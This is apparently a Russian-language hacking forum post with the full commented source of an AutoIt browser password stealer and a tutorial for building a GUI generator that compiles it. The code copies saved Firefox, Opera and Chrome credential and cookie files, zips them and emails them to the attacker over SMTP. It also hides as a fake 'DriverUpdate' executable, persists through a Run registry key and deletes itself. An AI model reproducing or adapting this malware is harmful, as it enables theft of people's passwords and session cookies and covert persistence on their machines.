Разные статьи.

[Rogge]

Код:

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;post: [url=http://forum.thehackworld.in/index.php?threads/Троян-password.218/]thehackworld.in[/url]
#NoTrayIcon ;Указывает, что при запуске сценария AutoIt требуется скрыть его индикатор,то есть тупа скрывает иконку с трея
;{#Include - Включить указанный файл внутрь текущего сценария. (Добавляем необходимые библиотеки(сценарии))
#Include "File.au3"
#include "FTPEx.au3"
#Include "process.au3"
#include "Zip_UDF.au3"
#include "Inet.au3"
;}

$sArgument = '/600' ;задержка перед началом работы в 600 секунд,нужна для добавления в автозагрузку,в принципе можно и убрать,
;но тогда скрипт будет стартовать сразу после запуска винды,если конечно же оставить функцию автозагрузки.
; объявляем переменны
$dir=@TempDir & "\winsc" ; временная папка в которую будут копироваться все файлы,после архивироваться
$File = $dir&"\*.*"
DirCreate($dir ) ; создаём временную папку [ DirCreate("path" )-Создать директорий/папку. ]
$ata=@TempDir & "\archi.zip"
$var = _GetIP() ; проверяем наличие инета,вообще лучше проверять через ping ну он чёт у меня не заработал,нашёл другое решение.
;_GetIP - возращает ip адрес,при чём внешний,но только если есть конект,если конекта нету,значить и ip адреса нету и он вернёт -1,вот и выход из сложившейся ситуации.

$e=StringCompare($var,"-1")
If Not $e= 0 Then ; если конект есть то выполняем код,иначе при попытке отправить на мыло файлы вылетит ошибка.
; #Include <process.au3>
;_RunDOS( $sCommand )
;Скрытно выполнить команду DOS. Окно MS-DOS не отображается.
_RunDOS ( "cd %AppData%\Mozilla\Firefox\Profiles\*.default\&&copy /y key3.db %temp%\winsc\key3.db" ) ; копируем средствами CMD нужные нам файлы в временную папку
Sleep(100)
_RunDOS ( "cd %AppData%\Mozilla\Firefox\Profiles\*.default\&&copy /y signons.sqlite %temp%\winsc\" )
Sleep(100)
_RunDOS ( "cd %AppData%\Mozilla\Firefox\Profiles\*.default\&&copy /y cookies.sqlite %temp%\winsc\" )
Sleep(100)
FileCopy(@AppDataDir & "\Opera\Opera\wand.dat",$dir&"\wand.dat",1) ; дальше работает на Autoit'e
Sleep(10)
FileCopy(@AppDataDir & "\Opera\Opera\cookies4.da",$dir&"\cookies4.dat",1); "FileCopy - Скопировать указанный файл,синтаксис FileCopy ( "Путь к исходному копируемому файлу (файлам).  Поддерживаются сокращения в названиях - (*).", "Путь к файлу (файлам) результату.  Поддерживаются сокращения в названиях - (*)." [,flag] )
; flag - (опциональный) указывает следует ли перезаписывать файл (файлы) в том случае, когда он (они) уже имеется:
;0 - (стандартное значение) не перезаписывать имеющиеся файлы
;1 - перезаписывать имеющиеся файлы
;8 - создавать соответствующую структуру папок получателя, если ее нет. См. Замечания.
Sleep(10)
FileCopy( @UserProfileDir & "\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data", $dir&"\Web_Data.s", 1 )
Sleep(10)
FileCopy( @UserProfileDir & "\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data", $dir&"\Login_Data.s", 1 )
;FileOpen - Открыть текстовый файл для чтения и записи.
;FileOpen ( "filename", mode )
;filename - Название текстового файла.
;mode -Режим открытия файла.
;0 - открыть для чтения
;1 - открыть для записи только в конец файла
;2 - открыть для записи и удалить имеющееся содержание
;4 - открыть для чтение в режиме как есть (raw)
;8 - создать структуру папок, если она отсутствует. См. Замечания.
;16 - принудительное бинарное (по байтам) чтение и запись с помощью FileRead и FileWrite
;32 - режим Unicode UTF16 Little Endian для записи текста с помощью FileWrite и FileWriteLine (стандарный режим ANSI символы)
;64 - режим Unicode UTF16 Big Endian для записи текста с помощью FileWrite и FileWriteLine (стандарный режим ANSI символы)
;128 - режим Unicode UTF8 для записи текста с помощью FileWrite и FileWriteLine (стандарный режим ANSI символы)
;В любом из режимов записи будет создан файл, даже если он отсутствует. Это не относится к воссозданию структуры необходимых папок, что реализуется только при использовании режима 8.
$inf=fileopen($dir&"\info.html",2)
Sleep(100)
;FileWriteLine - Добавить строку текста в конец открытого ранее текстового файла.
; FileWriteLine ( filehandle or "filename", "line" )
;filehandle - Указатель файла, полученный при выполнении FileOpen. Либо просто строка с названием файла.
; line - Строка текста. Символы перехода на новую строку автоматически не добавляются.
filewriteline($inf,"<br><font color=red size=6 ><center>Virus autoitscript send PassFile by Lyubitel mod Swap 2,send all file in arhive ( TheHackWorld.iN )!</center></font><br>")
filewriteline($inf,"<p>Полученные файлы можно заменить на свои и просмотреть сохранённые пароли в соответственных браузерах.<br>")
filewriteline($inf,"<b>Если Вы <u>не знаете какие и куда файлы ложить</u>,вы <u>можете запустить bat файлы</u>,которые будут находится так же в архиве.</b>")
filewriteline($inf,"<li>Для резервного копирования своих файлов запустите 1.bat,рядом с ним будет создана папка и туда будет помещёны ваши файлы</li>")
filewriteline($inf,"<li>Для замены своих файлов на полученные,запустите 2.bat,который должен находится рядом с файлами во время запуска</li><br>")
filewriteline($inf,"<b>После откройте браузер и просматривайте хранящиеся в полученных файлах пароли:</b>")
filewriteline($inf,"<li><b>Для браузера Google Chrome:</b> Запустите браузер,перейдите в Настройки и Управления Google Chrome -> Параметры -> Персональные-> Управление сохранёнными паролями.</li>" )
filewriteline($inf,"<li><b>Для браузера Mozilla Firefox:</b> Запустите браузер,перейдите в Инструменты -> Настройки -> Защита -> Сохранённые пароли-> Отобразить пароли.</li>")
filewriteline($inf,"<li><b>Для браузера Opera:</b> Запустите браузер,перейдите в Меню -> Настройки -> Формы -> Пароли.</li><br>")
filewriteline($inf,"<b>Для возрата своих файлов на место,запустите 3.bat.</b><br>")
filewriteline($inf,"<font color=red size=6 ><center>by SwAp ( <a href=http://thehackworld.in >TheHackWorld.iN</a> )</center></font><p>")
;FileClose - Закрыть открытый ранее текстовый файл.
FileClose($inf)
$bat1=fileopen($dir&"\1.bat",2)
filewriteline($bat1,"md myFile")
filewriteline($bat1,"cd %AppData%\Mozilla\Firefox\Profiles\*.default\&&copy /y key3.db myFile\key3.db")
filewriteline($bat1,"cd %AppData%\Mozilla\Firefox\Profiles\*.default\&&copy /y signons.sqlite myFile\signons.sqlite")
filewriteline($bat1,"cd %AppData%\Mozilla\Firefox\Profiles\*.default\&&copy /y cookies.sqlite myFile\cookies.sqlite")
filewriteline($bat1,"copy %appdata%\Opera\Opera\wand.dat myFile\Wand.dat")
filewriteline($bat1,"copy %appdata%\Opera\Opera\cookies4.dat myFile\cookies4.dat")
filewriteline($bat1,'copy "%userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data" "myFile\Web Data"')
filewriteline($bat1,'copy "%userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data" "myFile\Login Data"')
fileclose($bat1)
$bat2=fileopen($dir&"\2.bat",2)
filewriteline($bat2,"copy /y key3.db %AppData%\Mozilla\Firefox\Profiles\*.default\key3.db")
filewriteline($bat2,"copy /y signons.sqlite %AppData%\Mozilla\Firefox\Profiles\*.default\signons.sqlite")
filewriteline($bat2,"copy /y cookies.sqlite %AppData%\Mozilla\Firefox\Profiles\*.default\cookies.sqlite")
filewriteline($bat2,"copy /y Wand.dat %appdata%\Opera\Opera\wand.dat myFile\Wand.dat")
filewriteline($bat2,"copy /y cookies4.dat %appdata%\Opera\Opera\wand.dat myFile\cookies4.dat")
filewriteline($bat2,'copy /y "Web_Data.s" "%userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data"')
filewriteline($bat2,'copy /y "Login_Data.s" "%userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data"')
fileclose($bat2)
$bat3=fileopen($dir&"\3.bat",2)
filewriteline($bat3,"copy /y myFile\key3.db %AppData%\Mozilla\Firefox\Profiles\*.default\key3.db")
filewriteline($bat3,"copy /y myFile\signons.sqlite %AppData%\Mozilla\Firefox\Profiles\*.default\signons.sqlite")
filewriteline($bat3,"copy /y myFile\cookies.sqlite %AppData%\Mozilla\Firefox\Profiles\*.default\cookies.sqlite")
filewriteline($bat3,"copy /y myFile\Wand.dat %appdata%\Opera\Opera\wand.dat myFile\Wand.dat")
filewriteline($bat3,"copy /y myFile\cookies4.dat %appdata%\Opera\Opera\wand.dat myFile\cookies4.dat")
filewriteline($bat3,'copy /y "myFile\Web Data" "%userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data"')
filewriteline($bat3,'copy /y "myFile\Login Data" "%userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data"')
fileclose($bat3)
_ZipCreate($ata) ; Создаём архив,куда будут упакованы ранее скопированные и созданные файлы
Sleep(100)
_ZipAdd($ata, $File) ; добавляем файлы в ранее созданный архив
Sleep(1000)
; FileExists - Проверка наличия указанного файла или директория.
if FileExists($ata) then ; проверяем создан ли архив,если создан то
_send_mail() ; запускаем функцию отправки письма
EndIf
Sleep(1000)
;FileDelete ( "path" ) - Удалить файл (файлы). Поддерживается сокращения в именах файлов,то есть возможно указать *.*
filedelete($ata)
;DirRemove - Удалить директорий/папку.
; DirRemove( "path" [,recurse] )
;path Путь к удаляемой директории.
;recurse - (опциональный) Используется для дополнительного удаления поддиректориев.
;0 = (стандартное значение) не удалять файлы и поддиректории
;1 = удалить файлы и поддиректории, подобна команде DOS - DelTree
DirRemove($dir, 1 ) ; удаляем папку winsc
_dels() ;само удаляемся
Else; если конекта нету,то
$de=@HomeDrive&"\DriverStores" ; объявляем переменную $de,которая будет означать путь до папки на системном диске,которую в свою очередь мы создаим в случае неудачного конекта и в которую скопируемся,с глаз долой.
if not @ScriptFullPath<>$de&"\DriverUdate.exe" then  ;проверяем не находимся мы в так сказать временного содержания,если нет то
dircreate($de) ; создаём папку
FileSetAttrib($de,"+H") ; ставим на неё атрибу скрыт
filecopy(@ScriptFullPath,$de&"\DriverUdate.exe",1) ; копирем сами себе в эту папку
_RegRun($sArgument) ;добавляемся в автозагрузку с задержкой перед запуском в десять минут.
sleep(1000)
_dels() ;самоудалемся
endif
EndIf


Func _send_mail() ; функция отправки средствами comobject
;Честно говоря описания к ним не искал,да и особо не разбирался с ними,так понимаю что куда и для чего,но точно описать что для чего не могу,так что тут описывать не буду
;если кому то нужно будет тот погуглит.
$str = "http://schemas.microsoft.com/cdo/configuration/"
$hMAIL = ObjCreate ("CDO.Message")
    With $hMAIL
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::{
;;;;;;;;;;;;;;;;;;;;;;;; Вносим данные 
        .From = "from_e-mail" ;from e-mail
        .To = "to-e-mail" ;to e-mail
        .Subject = @UserName&"- send all File"
        .TextBody = "Virus autoitscript send PassFile by Lyubitel mod Swap 2,send all file in arhive ( TheHackWorld.iN )!"
        .AddAttachment (@TempDir & "\archi.zip") ;файл для отправки
    EndWith
    With $hMAIL.Configuration.Fields
        .Item ($str & "sendusing") = 2
        .Item ($str & "smtpserver") = "smtp_server" ;SMTP Server
        .Item ($str & "smtpauthenticate") = 1
        .Item ($str & "sendusername") = "login_from" ;Login
        .Item ($str & "sendpassword") = "pass_from" ;Пароль SMTP-сервера
        .Item ($str & "smtpserverport") =port_from ;Порт
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;}
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

        .Update
    EndWith
$hMAIL.Send
EndFunc



Func _dels() ; функция само удаления
;~TempFile -Вернуть название для временного файла. Гарантируется, что файл с таким названием отсутствует в папке %TEMP%.
;~ #include <File.au3>
;~ _TempFile()
    $sTemp = _TempFile(@TempDir, '~', '.bat')
;FileGetShortName - Возвращает короткое название файла (8.3) в ответ на переданное полное название.
;~ FileGetShortName ( "file" )
;~ file-  Полное название файла, которое следует преобразовать
$sPath = FileGetShortName(@ScriptFullPath)
    $hFile = FileOpen($sTemp, 2)
    FileWriteLine($hFile, '@echo off')
    FileWriteLine($hFile, ':loop')
    FileWriteLine($hFile, 'del ' & $sPath)
    FileWriteLine($hFile, 'if exist ' & $sPath & ' goto loop')
    FileWriteLine($hFile, 'del ' & $sTemp)
    FileClose($hFile)
;Run - Запустить внешнее приложение.
; Run ( "filename" [, "workingdir" [, flag[, Standard_I/O_Flag]]] )
;filename- Название файла приложения (EXE, BAT, COM или PIF).
;workingdir- (опциональный) Рабочий директорий.
;flag -[опциональный] Состояние окна приложения после запуска:
;@SW_HIDE = скрыть окно
;@SW_MINIMIZE = свернуть окно
;@SW_MAXIMIZE = развернуть окно
;Standard_I/O_Flag - [опциональный] Предоставить рабочий внутренний идентификатор одного и более из стандартных потоков ввода-вывода дочернего процесса.
  ;1 ($STDIN_CHILD) - внутренний идентификатор STDIN потока
  ;2 ($STDOUT_CHILD) = внутренний идентификатор STDOUT потока
  ;4 ($STDERR_CHILD) = внутренний идентификатор STDERR потока
    Run($sTemp, '', @SW_HIDE)
EndFunc  ;==>_ScriptDestroy

; добавления в автозагрузку с задержкой перед запуском.
If $CmdLine[0] Then
;StringRegExpReplace - Заменить текст строки с помощью регулярного выражения.
;StringRegExpReplace ( "test", "pattern", "replace", [ count ] )
;test - Исходный текст
;pattern - Искомый образец (шаблон). Описание синтаксиса регулярных выражений см. в StringRegExp.
;replace - Текст замены.
;count - [опциональный] Количество проводимых замен. Стандартное значение 0 - выполнить все возможные замены.
    $iTimer = StringRegExpReplace($CmdLine[1], '[^0-9]', '') * 1000
;TimerInit - Возвращает значение абстрактного времени в миллисекундах.
    $iStart = TimerInit()
;TimerDiff - Вернуть значение длительности интервала времени, прошедшего с момента последнего вызова TimerInit
    While TimerDiff($iStart) <= $iTimer
        Sleep(250)
    WEnd
EndIf



Func _RegRun($s_Argument)
    Local $sRegRun = 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
; RegRead - Вернуть значение из реестра.
;RegRead ( "keyname", "valuename" )
;~ keyname - Ключ реестра.
;~ valuename - название значения.
    If Not RegRead($sRegRun, "DriverUpdate") Or RegRead($sRegRun, "DriverUpdate") <> @HomeDrive&"\DriverStores\DriverUdate.exe" & ' ' & $s_Argument Then
;RegWrite - Сохранить величину в реестре.
;~RegWrite ( "keyname", "valuename", "type", value )
;~ keyname - Ключ реестра.
;~ valuename - Название величины.
;~ type - Тип ключа - "REG_SZ" или "REG_DWORD".
;~ value - Значение сохраняемой в реестре величины.
        RegWrite($sRegRun, "DriverUpdate", 'REG_SZ', @HomeDrive&"\DriverStores\DriverUdate.exe " & $s_Argument)
    EndIf

 

[Rogge]

Назовём его "source.au3",если обратить внимание на начало скрипта:
Код:
;{#Include - Включить указанный файл внутрь текущего сценария. (Добавляем необходимые библиотеки(сценарии))

#Include "File.au3"
#include "FTPEx.au3"
#Include "process.au3"
#include "Zip_UDF.au3"
#include "Inet.au3"

;}
То можно заметить что "#Include" подключает необходимые библиотеки,ни из "include library" (эта папка в которой находятся библиотеки в Autoit,по умолчанию имеет путь: C:\Program Files\AutoIt3\Include,для подключения библиотек из этой папки,необходимы замыкать название нужно библиотеки в скобки < >.),а берёт он эти библиотеки с той же директории где находится сам,то есть при компиляции этого скрипта,все библиотеки которые он будет цеплять,должны находится рядом со скриптом.Вы же можете указывать свой путь,но помните что при компиляции,эти библиотеки должны там находится,то есть на тачке где не установлен Autoit,эти библиотеки нужно будет выгрузить по указанному пути,до компиляции самого скрипта.
Идём в папку куда устанавливали пакет Autoit,по умолчанию это C:\Program Files\AutoIt3,переходим в папку Include и копируем указанные в скрипте библиотеки,в моём случае это "File.au3","FTPEx.au3","process.au3","Zip_UDF.au3" ,"Inet.au3",копируем в ту же директорию в которой находится сам скрипт,после пытаемся его запустить.
Скрипт не будет работать,он потребует ещё библиотеки,которые будут тянуть скопированные библиотеки,а те в свою очередь потянут другие библиотеки,Вам же нужно будет копировать все библиотеки которые он будет просить,каждый раз пытаюсь запустить скрипт,до тех пор пока ошибки не прекратятся.
В месте куда должны будут вписываться данные(в данном случае это данные для авторизации на почтовом сервере отправителя и почтовый адрес получателя),вписываем слова которые ни где в скрипте больше не будут встречаться,то есть слова для каждого параметра должны быть уникальными в данном скрипте,вот та часть скрипта:
Код:

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::{
;;;;;;;;;;;;;;;;;;;;;;;; Вносим данные ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
        .From = "from_e-mail" ; тут почтовый адрес отправителя
        .To = "to-e-mail" ; тут почтовый адрес получателя
        .Subject = @UserName&"- send all File" ; это у нас будет тема письма,в ней будет имя пользователя запустившего вирус.
        .TextBody = "Virus autoitscript send PassFile by Lyubitel mod Swap 2,send all file in arhive ( TheHackWorld.iN )!" ; тут текст содержащийся в теле письма.
        .AddAttachment (@TempDir & "\archi.zip") ;файл для отправки
    EndWith
    With $hMAIL.Configuration.Fields
        .Item ($str & "sendusing") = 2
        .Item ($str & "smtpserver") = "smtp_server" ;SMTP сервер отправителя
        .Item ($str & "smtpauthenticate") = 1
        .Item ($str & "sendusername") = "login_from" ;логин от почтового ящика отправителя
        .Item ($str & "sendpassword") = "pass_from" ;Пароль от почтового ящика отправителя
        .Item ($str & "smtpserverport") =port_from ;Порт отправителя
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;}
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
В принципе слова могут быть какие угодно,но что бы не путаться в ходе написания генератора,да и вообще,рекомендую писать слова дающие какой нибудь смысл,допустим:
from_e-mail - Почтовый адрес отправителя,слово уникально для этого скрипта.
to-e-mail - почтовый адрес получателя
smtp_server - SMTP сервер отправителя
login_from - логин от почтового ящика отправителя
pass_from - Пароль от почтового ящика отправителя
port_from - Порт отправителя

Аналогично подстраиваете свой скрипт,на этом в принципе со скриптом вируса мы и закончим.Весь код скрипта вируса практически полностью,как можно подробно расписан и рас комментирован,так что вопросов относительно его работы,возникать не должно,да и тема у нас как написать генератор к нему,а ни как написать сам вирус.
Переходим в папку где находится сам компилятор,по умолчанию это "C:\Program Files\AutoIt3\Aut2Exe" и копируем от туда файлы Aut2exe.exe,AutoItSC.bin,upx.exe,(последний является популярным пакером UPX) эти файлы предназначены для x32 битных систем и по идеи не будут работать на x64 битных ОС,можно конечно написать более универсальный вариант,который будет определять битность,но это я оставлю Вам.Копируем всё это в ту же папку где находится сам скрипт и в добавок кинем туда же иконку с именем ico.ico.
Упаковываем в архив rar,при помощи архиватора WinRar или какого другого, ложем архив в ту папку где будет располагаться скрипт будущего генератора и на этом этап подготовки окончен,переходим к написанию самого генератора.


Генератор.


Оболочку можно написать в ручную,или же можно использовать какой нибудь генератор GUI оболочек для языка Autoit,к примеру я использовал генератор Koda,Вы же можете использовать какой нибудь другой.
Собираете визуально форму,в нашем случае это форма с одной кнопкой и четырьмя полями ввода текста,то есть под ввод адреса отправителя,пароля от этого адреса,адреса получателя и под указания порта от сервера отправителя.
Можете собрать свою,что конечно на много лучше,тем более что в этом нету ни чего сложного,или взять мою:

Код:

#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>


#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("Stealer write Autoit by SwAp", 348, 263, 197, 176)
GUISetIcon("im1.ico")
GUISetBkColor(0x008080)
$Label1 = GUICtrlCreateLabel("Stealer write Autoit by SwAp", 8, 8, 334, 36)
GUICtrlSetFont(-1, 20, 400, 0, "MS Sans Serif")
$Label2 = GUICtrlCreateLabel(" From e-mail", 0, 56, 91, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Label3 = GUICtrlCreateLabel("Password", 2, 84, 73, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Label4 = GUICtrlCreateLabel("To e-mail", 2, 113, 68, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Label5 = GUICtrlCreateLabel("Port e-mail", 1, 145, 79, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Input1 = GUICtrlCreateInput("[email protected]", 104, 56, 225, 21)
$Input2 = GUICtrlCreateInput("password", 104, 82, 225, 21)
$Input3 = GUICtrlCreateInput("[email protected]", 104, 109, 225, 21)
$Input4 = GUICtrlCreateInput("587", 104, 137, 225, 21)
$Button1 = GUICtrlCreat***tton("Genering", 80, 184, 193, 41, $WS_GROUP)
$Label6 = GUICtrlCreateLabel("by Swap", 8, 240, 45, 17)
$Label7 = GUICtrlCreateLabel("TheHackWorld.iN", 256, 240, 90, 17)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###


While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $Label7
Case $GUI_EVENT_CLOSE
Exit
Case $Button1
EndSwitch
WEnd
Честно говоря,так и не нашёл где там гиперлинку добавить,в принципе особо и не искал,сделал так,да и суть не в этом.
В форме нету ни чего лишнего,в принципе больше ни чего здесь и не нужно, осталось добавить действия при нажатие кнопки "Genering" и билдер будет готов.
Но сначала добавим распаковку ранее созданного архива,в нужную нам папку(потому как с памятью работать на нём не получится) и только потом будем дописывать действия на кнопку.
Добавляем необходимую библиотеку Zip_UDF.au3(для того что бы можно было распаковать архив),библиотеку File.au3,которая в свою очередь позволит работать с файлами,далее добавим пару команд,которые выгрузят и распакуют наш архив в указанную папку(в нашем случае это будет временная папка Temp),после чего уже в этой папке будет компилироваться наш скрипт,вообще можно написать что бы только при нажатие на кнопку архив распаковывался и сразу компилировался,но думаю будет лучше распаковывать архив ещё до нажатия кнопки,во первых быстрей будет создаваться вирус,а во вторых мы все равно при закрытие программы будем удалять выгруженный и распакованный архив.
Код:
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
;{;;;;Добавляем новые библиотеки;;;
#Include <File.au3> ;библиотека для работы с файлами,в принципе на этом этапе можно обойтись и без неё.
#include <Zip_UDF.au3> ; библиотека которая позволит распаковать архив
;};;;;;;;;
;{ пишем команды на выгрузку и распаковку архива:
$zipf=@tempdir&"\zip.rar" ;задаём переменную $zipf,которая будет нести в себе  имя и путь до архива,вообще можно сразу в команде указывать это имя.
$stel=@tempdir&"\steal" ; задаём переменную $stel,которая будет нести в себе путь до нашей временной папке,в которую распакуется архив и которую мы удалим при закрытие программы,в принципе сам архив мы тоже удалим.
fileinstall("zip.rar",$zipf,1) ;Включить и установить файл, имеющийся внутри компилированного скрипта.
; FileInstall ( "source", "dest" [,flag] )
;source - Исходный путь к файлу, который следует компилировать.  Поддерживается только явное значение, а не переменная, причем указанная строка не может иметь сокращения названий (*).
;dest - Путь к файлу получателю.  Поддерживаются сокращения в названиях - (*).
;flag - (опциональный) указывает следует ли перезаписывать файл (файлы) в том случае, когда он (они) уже имеется:
;0 = (стандартное значение) не перезаписывать имеющиеся файлы
;1 = перезаписывать имеющиеся файлы

sleep(1000) ; ждём одну секунду,пока выгрузится архив.
_UnZip($zipf, $stel); Распаковываем архив
; $zipf - архив который нужно распаковать
;$stel - директорию в которую необходимо распаковать архив.
;}

#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("Stealer write Autoit by SwAp", 348, 263, 197, 176)
GUISetIcon("im1.ico")
GUISetBkColor(0x008080)
$Label1 = GUICtrlCreateLabel("Stealer write Autoit by SwAp", 8, 8, 334, 36)
GUICtrlSetFont(-1, 20, 400, 0, "MS Sans Serif")
$Label2 = GUICtrlCreateLabel(" From e-mail", 0, 56, 91, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Label3 = GUICtrlCreateLabel("Password", 2, 84, 73, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Label4 = GUICtrlCreateLabel("To e-mail", 2, 113, 68, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Label5 = GUICtrlCreateLabel("Port e-mail", 1, 145, 79, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Input1 = GUICtrlCreateInput("[email protected]", 104, 56, 225, 21)
$Input2 = GUICtrlCreateInput("password", 104, 82, 225, 21)
$Input3 = GUICtrlCreateInput("[email protected]", 104, 109, 225, 21)
$Input4 = GUICtrlCreateInput("587", 104, 137, 225, 21)
$Button1 = GUICtrlCreat***tton("Genering", 80, 184, 193, 41, $WS_GROUP)
$Label6 = GUICtrlCreateLabel("by Swap", 8, 240, 45, 17)
$Label7 = GUICtrlCreateLabel("TheHackWorld.iN", 256, 240, 90, 17)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###


While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $Label7
Case $GUI_EVENT_CLOSE
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;
;{ И сразу добавим удаление выгруженного и распакованного архива при закрытие программы
filedelete($zipf) ; удаляем архив
; переменная $zipf указывает на путь до архива который нужно удалить
DirRemove($stel,1) ; удаляем директорию в которую был распакован архив
; переменная $stel указывает на путь до папки которую нужно удалить
; флаг 1 указывает что нужно удалить все файлы и поддиректории находящиеся в этой директории.
;}
Exit
Case $Button1
EndSwitch
WEnd

 

[Rogge]

В коде расписал куда и какие команды добавляем и что каждая из добавленных выполняет.
Далее приступим к действию при нажатие на кнопку "Genering",то есть к действию генерирования самого вируса.

 

[Rogge]

#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#Include <process.au3>
;{;;;;Добавляем новые библиотеки;;;
#Include <File.au3> ;библиотека для работы с файлами,в принципе на этом этапе можно обойтись и без неё.
#include <Zip_UDF.au3> ; библиотека которая позволит распаковать архив
;};;;;;;;;
;{ пишем команды на выгрузку и распаковку архива:
$zipf=@tempdir&"\zip.rar" ;задаём переменную $zipf,которая будет нести в себе  имя и путь до архива,вообще можно сразу в команде указывать это имя.
$stel=@tempdir&"\steal" ; задаём переменную $stel,которая будет нести в себе путь до нашей временной папке,в которую распакуется архив и которую мы удалим при закрытие программы,в принципе сам архив мы тоже удалим.
fileinstall("zip.rar",$zipf,1) ;Включить и установить файл, имеющийся внутри компилированного скрипта.
; FileInstall ( "source", "dest" [,flag] )
;source - Исходный путь к файлу, который следует компилировать.  Поддерживается только явное значение, а не переменная, причем указанная строка не может иметь сокращения названий (*).
;dest - Путь к файлу получателю.  Поддерживаются сокращения в названиях - (*).
;flag - (опциональный) указывает следует ли перезаписывать файл (файлы) в том случае, когда он (они) уже имеется:
;0 = (стандартное значение) не перезаписывать имеющиеся файлы
;1 = перезаписывать имеющиеся файлы

sleep(1000) ; ждём одну секунду,пока выгрузится архив.
_UnZip($zipf, $stel); Распаковываем архив
; $zipf - архив который нужно распаковать
;$stel - директорию в которую необходимо распаковать архив.
;}

#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("Stealer write Autoit by SwAp", 348, 263, 197, 176)
GUISetIcon("im1.ico")
GUISetBkColor(0x008080)
$Label1 = GUICtrlCreateLabel("Stealer write Autoit by SwAp", 8, 8, 334, 36)
GUICtrlSetFont(-1, 20, 400, 0, "MS Sans Serif")
$Label2 = GUICtrlCreateLabel(" From e-mail", 0, 56, 91, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Label3 = GUICtrlCreateLabel("Password", 2, 84, 73, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Label4 = GUICtrlCreateLabel("To e-mail", 2, 113, 68, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Label5 = GUICtrlCreateLabel("Port e-mail", 1, 145, 79, 24)
GUICtrlSetFont(-1, 12, 400, 0, "MS Sans Serif")
$Input1 = GUICtrlCreateInput("[email protected]", 104, 56, 225, 21)
$Input2 = GUICtrlCreateInput("password", 104, 82, 225, 21)
$Input3 = GUICtrlCreateInput("[email protected]", 104, 109, 225, 21)
$Input4 = GUICtrlCreateInput("587", 104, 137, 225, 21)
$Button1 = GUICtrlCreat***tton("Genering", 80, 184, 193, 41, $WS_GROUP)
$Label6 = GUICtrlCreateLabel("by Swap", 8, 240, 45, 17)
$Label7 = GUICtrlCreateLabel("TheHackWorld.iN", 256, 240, 90, 17)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###


While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $Label7
_RunDOS( "start http://thehackworld.in")
Case $GUI_EVENT_CLOSE
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;{ И сразу добавим удаление выгруженного и распакованного архива при закрытие программы
filedelete($zipf) ; удаляем архив
; переменная $zipf указывает на путь до архива который нужно удалить
DirRemove($stel,1) ; удаляем директорию в которую был распакован архив
; переменная $stel указывает на путь до папки которую нужно удалить
; флаг 1 указывает что нужно удалить все файлы и поддиректории находящиеся в этой директории.
;}
Exit
Case $Button1
;;;;;;;;;;;;;;;;;;;;;;;;;;
; Добавляем действия при нажатие на кнопку

; GUICtrlRead ( controlID [, advanced] ) -Вернуть значение состояния и данных элемента.
;Параметры
;controlID - Идентификатор элемента, полученный при вызове GUICtrlCreate....
;advanced - [опциональный] Вернуть дополнительные сведения в виде двумерного массива.
;0 = (Стандартное значение) Одно значение о состоянии или данных элемента.
;1 = (Расширенный режим чтения) Массив данных о состоянии или тексте элемента.

$from=GUICtrlRead($Input1) ; считываем введённые данные в первое поле,которое отвечает за почтовый адрес отправителя и записываем его содержимое в переменную $from
$pass=GUICtrlRead($Input2) ; считываем введённые данные во второе поле,которое отвечает за пароль от почтового адреса отправителя и записываем его в переменную $pass
